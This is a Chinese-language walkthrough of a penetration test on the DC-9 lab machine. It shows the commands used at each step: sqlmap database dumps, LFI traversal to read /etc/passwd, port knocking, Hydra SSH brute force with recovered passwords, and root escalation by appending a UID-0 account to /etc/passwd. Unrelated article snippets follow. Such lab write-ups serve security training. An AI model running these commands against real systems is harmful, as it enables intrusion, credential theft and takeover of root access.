一次DC9靶机的渗透测试

1.信息收集

2.SQL注入获取用户

3.LFI读取etcpasswd

4.Hydra爆破SSH

5.添加etcpasswd用户提权

1.信息收集:

探测存活主机

nmap -sP 192.168.11.1/24

发现主机探测端口和服务:

nmap -sV -p 1-65535 192.168.11.144

2.SQL注入获取用户:

HTTP服务,浏览器打开看一下:

一番查找发现SQL注入:

回显:

我们先看是什么请求:

发现post请求,参数search,直接上SQLmap一把梭:

先查看数据库:

sqlmap -u "http://192.168.11.144/results.php" --data "search=1" --dbs

查看users的表名:

sqlmap -u "http://192.168.11.144/results.php" --data "search=1" -D users --tables

直接查看数据:

sqlmap -u "http://192.168.11.144/results.php" --data "search=1" -D users -T UserDetails --dump

这个可能是CMS的登录账号密码,但不知道对应哪一个,做一个字典,直接上BP爆破

我们随便填一个用户名密码

填上字典,开始爆破

结果返回:

我将长度排列了一下,发现并没有特别的,说明这不是登录的账号密码,结合之前我们在SQL注入的时候还发现了一个staff,我们查看一下:

sqlmap -u "http://192.168.11.144/results.php" --data "search=1" -D Staff --tables

查看Users:

sqlmap -u "http://192.168.11.144/results.php" --data "search=1" -D Staff -T Users --dump

又发现了一个账号密码,尝试登录:

成功

3.LFI读取etcpasswd

 点击Manager时,发现File does not exist,很有可能是本地的文件包含漏洞

因为可能是文件包含我们尝试一下:

因为这里我们已经登录了,要加上cookie:

文件包含漏洞,一般都有etcpasswd,我们查找,使用FUZZ找参数,../ 确保我们能回到根目录:

wfuzz -b 'PHPSESSID=0jhk7n6940j418rtt7oqjhp374' -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.11.144/manage.php?FUZZ=../../../../../../../../../../etc/passwd

参数太多,我们过滤:

wfuzz -b 'PHPSESSID=0jhk7n6940j418rtt7oqjhp374' --hw 100 -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.11.144/manage.php?FUZZ=../../../../../../../../../../etc/passwd

找到参数file,浏览器访问:

http://192.168.11.144/manage.php?file=../../../../../../etc/passwd

4.Hydra爆破SSH:

 在访问etcpasswd时,发现里面的账号是我们之前sql爆破时得到的一样,并且还有密码,那么我们尝试SSH登录:   

hydra -L user.txt -P pass.txt 192.168.11.144 ssh

告诉我们连接拒绝,但是之前我们扫端口时候,它是开放的,那么可能端口被隐藏了

分析:

1、端口被限制(防火墙)

2、用户被限制登录

3、运行了knockd服务

我们看一下knocked服务,在浏览器访问:

http://192.168.11.144/manage.php?file=. ./../../../../../../../../etc/knockd.conf

确实开启了这个服务,定义了3个敲门序列,7469,8475,9842 ,

只有我们依次访问这几个端口,才能打开ssh服务:

nmap -p 7469 192.168.11.144

nmap -p 8475 192.168.11.144

nmap -p 9842 192.168.11.144

扫完以后,我们扫22端口,查看是否打开:

nmap -p22 192.168.11.144

已经打开

那么就简单了,我们继续用字典去尝试登录SSH:

hydra -L user.txt -P pass.txt 192.168.11.144 ssh

发现三个,尝试登录:

ssh janitor@192.168.142.139 Ilovepeepee

ssh joeyt@192.168.142.139 Passw0rd

ssh chandlerb@192.168.142.139 UrAG0D!

思路:

查看用户文件 ls -a

查看root权限 sudo -l

查看历史命令 history

发现六个密码,添加字典上去,其他用户没什么发现,再扫一遍:

hydra -L user.txt -P pass.txt 192.168.11.144 ssh

发现新用户,登录!

login: fredf   password: B4-Tru3-001

5.添加etcpasswd用户提权:

登录以后这个查看可以执行root权限的命令不需要密码

查看文件属性:

file /opt/devstuff/dist/test/test

打开执行发现:

发现一个.py脚本,我们查找源码:

find / -name "test.py" 2>/dev/null

查看源码:

把第一个文件的输入追加到第二个文件中去

那么我们添加用户提权,添加一个UID和GID都是0的用户

生成密码:

openssl passwd -1 -salt admin 123456

$1$admin$LClYcRe.ee8dQwgrFc5nz.

添加到临时文件中去:

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd

打开有脚本的目录:cd /opt/devstuff/dist/test/

利用脚本追加root权限的用户:sudo ./test /tmp/passwd /etc/passwd 

尝试登录:su admin 输入密码123456

提权成功!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/35393.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

liunx 搭建 zookeeper

创建下载路径 #创建文件夹 mkdir -p /mydata/zookeeper #进入文件夹 cd /mydata/zookeeper下载zookeeper文件 #下载 wget https://mirrors.aliyun.com/apache/zookeeper/zookeeper-3.5.9/apache-zookeeper-3.5.9-bin.tar.gz #解压文件 tar -zxvf apache-zookeeper-3.5.9-bin.…

主机电子邮件访问:实现高效沟通与数据管理的综合指南

主机电子邮件访问:实现高效沟通与数据管理的综合指南 在当今数字化时代,电子邮件已成为企业和个人沟通的主要方式之一。主机电子邮件访问服务,作为一种集中管理和维护电子邮件系统的解决方案,不仅提高了通信效率,还增…

2024年6月29日(星期六)骑行十里箐

2024年6月29日 (星期六)骑行十里箐,早8:00到8:30,大观公园门口集合,9:00准时出发【因迟到者,骑行速度快者,可自行追赶偶遇。】 偶遇地点:大观公园门口集合 ,家住东,南,北…

如何在前端项目中制定代码注释规范

本文是前端代码规范系列文章,将涵盖前端领域各方面规范整理,其他完整文章可前往主页查阅~ 开始之前,介绍一下​最近很火的开源技术,低代码。 作为一种软件开发技术逐渐进入了人们的视角里,它利用自身独特的优势占领市…

四步轻松搞定!探索字节最新AnimateDiff-Lightning:高质量视频生成的秘密武器!

字节前脚刚发布了文生图大模型 SDXL-Lightning,后脚就又对文生视频领域下手了。 就在这几天又推出了文生视频模型:AnimateDiff-Lightning,它是一种快速的文本到视频生成模型。它生成视频的速度比原始 AnimateDiff 快十倍以上,只需…

ConcurrentModificationException

正在用Iterator迭代器循环操作的集合不能调用集合的删除方法,否则就会报异常:ConcurrentModificationException。 (调用迭代器的remove方法可以) package test;import java.io.*; import java.util.*;public class Demo {public static void main(Strin…

2024-06-26 问AI: 在大数据模型中,deep speed 是什么?

文心一言 在大数据模型中,DeepSpeed是一个由微软开发并维护的开源深度学习优化库。其主要目的是提高大规模模型训练的效率和可扩展性,帮助开发者更有效率地管理及优化大模型的训练、部署任务。以下是DeepSpeed的主要特点和功能: 提高效率和…

如何处理Java中的方法过长?

如何处理Java中的方法过长?: 大家好,我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿!今天我们将探讨在Java中如何有效地处理方法过长的问题。 介绍 在大型…

秋招Java后端开发冲刺——非关系型数据库篇(MongoDB)

MongoDB 本文介绍非关系型数据库MongoDB的基础知识和常见面试题。 (一)基础知识 1. 介绍:MongoDB是一个基于分布式文件存储的数据库,由C语言编写,旨在为WEB应用提供可扩展的高性能数据存储解决方案。 2.特点 特点…

java中double与String转换并相加,相减等运算

将double与String进行相互转换,并执行相加、相减等操作,并可以保留一定的小数位数。 1. double 与 String 之间的转换 double 转 String 使用 Double.toString(double d) 方法: double num 123.456; String str Double.toString(num); …

凯迪正大对高压电缆泄漏与耐压试验方法及步骤分享

为确保高压电缆的性能和安全进行泄漏和耐压试验是必不可少的环节,本文还是依照凯迪正大的从业经验介绍高压电缆泄漏和耐压试验的方法及步骤。希望能对大家起到积极的作用,也欢迎大家留言交流讨论与指正。 一、试验目的 高压电缆泄漏和耐压试验的主要目的…

关于今天对于四象限法则的运用(6月26日)

每日三问?你为什么活着?你为什么准备专升本?你为什么打算考研? 因为广阔的生命等待着我自己的体验和探索,不能以目标为导向,要以目标的实践活动为导向,这样自己的生命才会有意义才能进行一个不断…

怎样实现聊天弹幕效果?

可以使用HTML、CSS和JavaScript的组合。以下是一个简单的步骤和示例代码&#xff0c;说明如何创建一个基本的弹幕效果&#xff1a; HTML结构&#xff1a; 创建一个用于显示弹幕的容器和输入弹幕的表单。 <!DOCTYPE html> <html lang"en"> <hea…

SDN的实际应用

SDN&#xff08;Software-Defined Networking&#xff0c;软件定义网络&#xff09;是一种网络架构&#xff0c;它通过将网络控制层与数据转发层分离&#xff0c;实现网络的集中控制和灵活管理。SDN的核心思想是通过软件来定义网络行为&#xff0c;从而使得网络更加灵活、可编程…

转运机器人:智能物流的得力助手

在物流行业&#xff0c;转运机器人已经成为提高转运效率、降低成本的重要工具。而富唯智能转运机器人凭借其出色的性能和智能化的设计&#xff0c;成为了众多企业的得力助手。 富唯智能转运机器人采用了先进的AMR控制系统&#xff0c;可以一体化控制移动机器人并实现与产线设备…

【AIGC】关于我用AI这玩意儿搞到人生第一笔副业这件事

前言 起初只是对AI感兴趣 后来没想到这玩意儿还能让我接兼职 我已经嗅到了AI的商机 接下来就是挖掘更钝金主爸爸 低收入一定要学&#xff01;&#xff01;&#xff01;&#xff01; 新手可以先从Midiourney入手 PS&#xff1a;如果不知道怎么学&#xff0c;可以扫描下方二…

渗透测试之SQL注入

渗透测试之SQL注入 1. SQL注入分类 按照攻击类型分为&#xff1a;联合查询注入、布尔注入、时间延迟注入、报错型注入、堆叠型注入等 按照注入位置分为&#xff1a;HTTP头注入、请求参数注入等 按照数据库场景分为&#xff1a;MySQL注入、MSSQL注入、Oracle场景注入 1. My…

注意!!2024下《系统分析师》易混淆知识点来了,赶紧收藏

宝子们&#xff0c;在复习软考系统分析师中&#xff0c;是不是觉得有很多知识点含义比较相近&#xff0c;很多友友刚看的时候估计会像我一样迷迷糊糊的&#xff0c;作为一个软考老鸟&#xff0c;在这里给大家整理了系分学习过程中易混淆的知识点&#xff0c;大家认真复习就行&a…

网络安全入门教程(非常详细)从零基础入门到精通,看完这一篇你就是网络安全高手了。

关于我 我算是“入行”不久的一个新人安全工作者&#xff0c;为什么是引号呢&#xff0c;因为我是个“半个野路子”出身。早在13年的时候&#xff0c;我在初中时期就已经在90sec、wooyun等社区一直学习、报告漏洞。后来由于升学的压力&#xff0c;我逐渐淡出了安全圈子&#x…

基于ssm实现的车辆管理系统(文末源码+Lw)272

摘要 当下&#xff0c;正处于信息化的时代&#xff0c;许多行业顺应时代的变化&#xff0c;结合使用计算机技术向数字化、信息化建设迈进。以前企业对于车辆信息的管理和控制&#xff0c;采用人工登记的方式保存相关数据&#xff0c;这种以人力为主的管理模式已然落后。本人结…